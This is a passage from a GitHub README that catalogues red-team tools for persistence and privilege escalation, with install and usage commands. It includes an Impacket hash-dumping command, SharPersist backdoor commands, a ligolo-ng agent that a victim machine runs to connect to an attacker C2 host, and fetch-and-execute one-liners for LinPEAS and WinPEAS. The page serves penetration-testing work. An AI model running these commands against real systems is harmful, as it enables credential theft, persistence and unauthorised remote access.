class="pl-cce">\P</span>owerZure.psd1</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get a list of AzureAD and Azure objects you have access to Get-AzureTarget"><pre><span class="pl-c"><span class="pl-c">#</span> Get a list of AzureAD and Azure objects you have access to</span> Get-AzureTarget</pre></div> <p dir="auto"><a href="https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a" rel="nofollow">Blog - Attacking Azure, Azure AD, and Introducing PowerZure</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png"><img src="https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://hakin9.org" rel="nofollow">https://hakin9.org</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Persistence</h1><a id="user-content-persistence" class="anchor" aria-label="Permalink: Persistence" href="#persistence"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fortra/impacket">Impacket</a></h3><a id="user-content-impacket" class="anchor" aria-label="Permalink: 🔙Impacket" href="#impacket"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.</p> <p dir="auto">It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install impacket"><pre>python3 -m pip install impacket</pre></div> <p dir="auto"><strong>Install: (With Example Scripts)</strong></p> <p dir="auto">Download and extract <a href="https://github.com/fortra/impacket">the package</a>, then navigate to the install folder and run...</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install ."><pre>python3 -m pip install <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # Gets a list of the sessions opened at the remote hosts netview.py domain/user:password -target 192.168.10.2 # Retrieves the MSSQL instances names from the target host. mssqlinstance.py 192.168.1.2 # This script will gather data about the domain's users and their corresponding email addresses. GetADUsers.py domain/user:password@IP"><pre><span class="pl-c"><span class="pl-c">#</span> Extract NTLM hashes with local files</span> secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL <span class="pl-c"><span class="pl-c">#</span> Gets a list of the sessions opened at the remote hosts</span> netview.py domain/user:password -target 192.168.10.2 <span class="pl-c"><span class="pl-c">#</span> Retrieves the MSSQL instances names from the target host.</span> mssqlinstance.py 192.168.1.2 <span class="pl-c"><span class="pl-c">#</span> This script will gather data about the domain's users and their corresponding email addresses.</span> GetADUsers.py domain/user:password@IP</pre></div> <p dir="auto">Great <a href="https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/" rel="nofollow">cheat sheet</a> for Impacket usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png"><img src="https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/EmpireProject/Empire">Empire</a></h3><a id="user-content-empire" class="anchor" aria-label="Permalink: 🔙Empire" href="#empire"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.</p> <p dir="auto">Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.</p> <p dir="auto">Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/EmpireProject/Empire cd Empire sudo ./setup/install.sh"><pre>git clone https://github.com/EmpireProject/Empire <span class="pl-c1">cd</span> Empire sudo ./setup/install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Start Empire ./empire # List live agents list agents # List live listeners list listeners"><pre><span class="pl-c"><span class="pl-c">#</span> Start Empire</span> ./empire <span class="pl-c"><span class="pl-c">#</span> List live agents</span> list agents <span class="pl-c"><span class="pl-c">#</span> List live listeners</span> list listeners</pre></div> <p dir="auto">Nice usage <a href="https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf">cheat sheet</a> by <a href="https://github.com/HarmJ0y">HarmJoy</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png"><img src="https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/SharPersist">SharPersist</a></h3><a id="user-content-sharpersist" class="anchor" aria-label="Permalink: 🔙SharPersist" href="#sharpersist"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A Windows persistence toolkit written in C#.</p> <p dir="auto">The project has a <a href="https://github.com/mandiant/SharPersist/wiki">wiki</a>.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can find the most recent release <a href="https://github.com/mandiant/SharPersist/releases">here</a>.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <ul dir="auto"> <li>Download the project files from the <a href="https://github.com/mandiant/SharPersist">GitHub Repo</a>.</li> <li>Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"</li> <li>Go to "NuGet Package Manager" --> "Package Sources"</li> <li>Add a package source with the URL "<a href="https://api.nuget.org/v3/index.json" rel="nofollow">https://api.nuget.org/v3/index.json</a>"</li> <li>Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019. <ul dir="auto"> <li><code>Install-Package Costura.Fody -Version 3.3.3</code></li> </ul> </li> <li>Install the TaskScheduler package <ul dir="auto"> <li><code>Install-Package TaskScheduler -Version 2.8.11</code></li> </ul> </li> <li>You can now build the project yourself!</li> </ul> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">A full list of usage examples can be found <a href="https://github.com/mandiant/SharPersist#adding-persistence-triggers-add">here</a>.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="#KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add"><pre class="notranslate"><code>#KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png"><img src="https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nicocha30/ligolo-ng">ligolo-ng</a></h3><a id="user-content-ligolo-ng" class="anchor" aria-label="Permalink: 🔙ligolo-ng" href="#ligolo-ng"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).</p> <p dir="auto">Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using <a href="https://gvisor.dev/" rel="nofollow">Gvisor</a>.</p> <p dir="auto">When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.</p> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">Precompiled binaries (Windows/Linux/macOS) are available on the <a href="https://github.com/nicocha30/ligolo-ng/releases">Release page</a>.</p> <p dir="auto"><strong>Install: (Build)</strong></p> <p dir="auto"><em>Building ligolo-ng (Go >= 1.17 is required):</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go"><pre>go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go <span class="pl-c"><span class="pl-c">#</span> Build for Windows</span> GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go</pre></div> <p dir="auto"><strong>Setup: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up"><pre>sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link <span class="pl-c1">set</span> ligolo up</pre></div> <p dir="auto"><strong>Setup: (Windows)</strong></p> <p dir="auto">You need to download the <a href="https://www.wintun.net/" rel="nofollow">Wintun</a> driver (used by <a href="https://www.wireguard.com/" rel="nofollow">WireGuard</a>) and place the <code>wintun.dll</code> in the same folder as Ligolo (make sure you use the right architecture).</p> <p dir="auto"><strong>Setup: (Proxy server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates"><pre>./proxy -h <span class="pl-c"><span class="pl-c">#</span> Help options</span> ./proxy -autocert <span class="pl-c"><span class="pl-c">#</span> Automatically request LetsEncrypt certificates</span></pre></div> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto"><em>Start the agent on your target (victim) computer (no privileges are required!):</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./agent -connect attacker_c2_server.com:11601"><pre>./agent -connect attacker_c2_server.com:11601</pre></div> <p dir="auto">A session should appear on the proxy server.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000""><pre class="notranslate"><code>INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" </code></pre></div> <p dir="auto">Use the session command to select the agent.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="ligolo-ng » session ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000"><pre class="notranslate"><code>ligolo-ng » session ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 </code></pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/nicocha30/ligolo-ng#using-ligolo-ng">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png"><img src="https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/nicocha30/ligolo-ng#demo">https://github.com/nicocha30/ligolo-ng#demo</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Privilege Escalation</h1><a id="user-content-privilege-escalation" class="anchor" aria-label="Permalink: Privilege Escalation" href="#privilege-escalation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vu-ls/Crassus">Crassus</a></h3><a id="user-content-crassus" class="anchor" aria-label="Permalink: 🔙Crassus" href="#crassus"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files. The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal." - <a href="https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus">Link</a></p> <p dir="auto"><strong>Install: (Build)</strong></p> <p dir="auto">Crassus was developed as a Visual Studio 2019 project. To build Crassus.exe:</p> <ol dir="auto"> <li>Open Crassus.sln</li> <li>Press Ctrl+Shift+B on your keyboard</li> </ol> <p dir="auto"><strong>Install: (precompiled)</strong></p> <p dir="auto">If you trust running other people's code without knowing what it does, Crassus.exe is <a href="https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe">provided in this repository</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>In <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon" rel="nofollow">Process Monitor</a>, select the <code>Enable Boot Logging</code> option.</li> <li>Reboot.</li> <li>Once you have logged in and Windows has settled, optionally also run <a href="https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c">scheduled tasks that may be configured to run with privileges</a>.</li> <li>Run Process Monitor once again.</li> <li>When prompted, save the boot log.</li> <li>Reset the default Process Monitor filter using <code>Ctrl-R</code>.</li> <li>Save this log file, e.g., to <code>boot.PML</code>. The reason for re-saving the log file is twofold: <ol dir="auto"> <li>Older versions of Process Monitor do not save boot logs as a single file.</li> <li>Boot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of of Process Monitor itself.</li> </ol> </li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14"><img src="https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14" alt="Crassus" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots">https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">LinPEAS</a></h3><a id="user-content-linpeas" class="anchor" aria-label="Permalink: 🔙LinPEAS" href="#linpeas"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh"><pre>curl -L <span class="pl-s"><span class="pl-pds">"</span>https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh<span class="pl-pds">"</span></span> <span class="pl-k">|</span> sh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png"><img src="https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS">WinPEAS</a></h3><a id="user-content-winpeas" class="anchor" aria-label="Permalink: 🔙WinPEAS" href="#winpeas"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")"><pre><span class="pl-smi">$wp</span>=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest <span class="pl-s"><span class="pl-pds">"</span>https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe<span class="pl-pds">"</span></span> -UseBasicParsing <span class="pl-k">|</span> Select-Object -ExpandProperty Content))<span class="pl-k">;</span> [winPEAS.Program]::Main(<span class="pl-s"><span class="pl-pds">"</span><span class="pl-pds">"</span></span>)</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png"><img src="https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a 